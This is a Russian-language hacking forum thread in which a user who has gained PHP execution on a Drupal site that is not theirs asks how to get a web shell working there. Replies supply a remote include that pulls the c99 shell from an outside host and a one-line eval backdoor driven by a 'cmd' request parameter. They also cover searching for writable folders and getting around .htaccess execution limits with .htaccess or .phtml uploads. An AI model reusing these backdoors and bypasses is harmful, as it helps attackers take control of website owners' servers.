|
Drupal: получилось испольнить php-код шелла, но проблема. ПОМОГИТЕ!
Получилось таким способом исполнить шел: http://forum.antichat.ru/showpost.php?p=1756391&postcount=6
Всё загрузил, но у меня не открывается шелл, а просто предлагается скачать файл php. Пробываал разные браузеры. Не знаю как быть. Потом воспользовался другим способом. Создал тему, сделал её phpшной. Вписал в тему сначала <?php include 'http://www.site.ru/files/c99.php3' ?> Потом целиком код шелла. При первой загрузке такой странице шелл отображается, но когда пытаюсь сделать какое либо действие, меня кидает уже на обычную страницу с ошибками: warning: Invalid argument supplied for foreach() in /var/www/htdocs/www.site.ru/includes/common.inc(1343) : eval()'d code(2) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 184. Подскажите как быть. Провозился целый день. Шелы залиты на сервак, но не срабатывают а лиш скачиваются. Да и через тему не получается. Пожскажите, может быть возможно исполнить какой-либо php-код который загрузить шелл в нужную мне папку. Я посмотрел. У них они там все почти пригодны для этого. Очень жду ответа. |
Значит не дурачки админы, тот способ проверялся на Win-платформе, скорее всего правильно расставленные(настроенные) .htaccess
Попробуй вместо "<?php include 'http://www.site.ru/files/c99.php3' ?>" сделай "if (isset($_REQUEST[cmd])) eval(stripslashes($_REQUEST[cmd]));" и посмотри все папки доступные на запись + их содержимое, учитывая .htaccess-ы сверху и внутри и их содержимое, т.е. нужно искать папку, доступную на запись и где нет ограничений на исполнение файлов. Если только корень - значит лить в корень PS: Уверен что версия 6.14? Такой способ заливки http://forum.antichat.ru/showpost.php?p=1756391&postcount=6 канает только на ней еще раз проверил - по умолчанию никаких ограничений в этой ветке нет на исполнение .php3 из http://site.ru/sites/default/files/wso2.php3, файл исполняется, не скачивается |
Вот на эту строку if (isset($_REQUEST[cmd])) eval(stripslashes($_REQUEST[cmd])); сайт никак не реагирует. В папки которые можно залить шелл я и так вижу, так как один раз шелл срабатывает и я вижу корень с папками и их правами. В корень залить точно можно.
Подскажите код скрипта который можно было бы выполнить, чтобы он закачал файл в корень. Очень жду совета. Надо довести дело до конца))) Pashkela, спасибо что откликнулся ;) |
в этом двиге .htaccess в некоторых директорях обрубает php скрипты, то есть если ты даже залил, то код тупо не будет исполняется. Помойму папка случаем не files называется?
|
Цитата:
Как это никак не реагирует? Ты же сказал, что php-скрипты в теме исполняются. Создай тему, туда пихни этот код, а потом вызови скрипт с параметром ?cmd=phpinfo();, например. |
Цитата:
а как же быть тогда? должен же быть выход... например если в статье исполнить какой-нить скрипт который загрузит шелл в другую папку или в корень например. или так нельзя? |
Цитата:
PHP Info показалось. Что дальше? Как мне это поможет? Вы уж простите если совсем тупые вопросы... |
И так не получается. Прав не хватает. Не загружается шел в папки /etc/, /tmp/ (((((((
|
Цитата:
с чего ты решил что не грузит в папку /tmp/? |
Я не смотрел этот друпал,и не пробывал залить шелл.
Но если там можно добавлять произвольные расширения,то попробуй добавить htaccess, и залить файл со своими правами на исполнение скриптов.Ну это так,раздумья. А еще попробуй залить шелл с расширением phtml :) может поможет. |
| Время: 13:11 |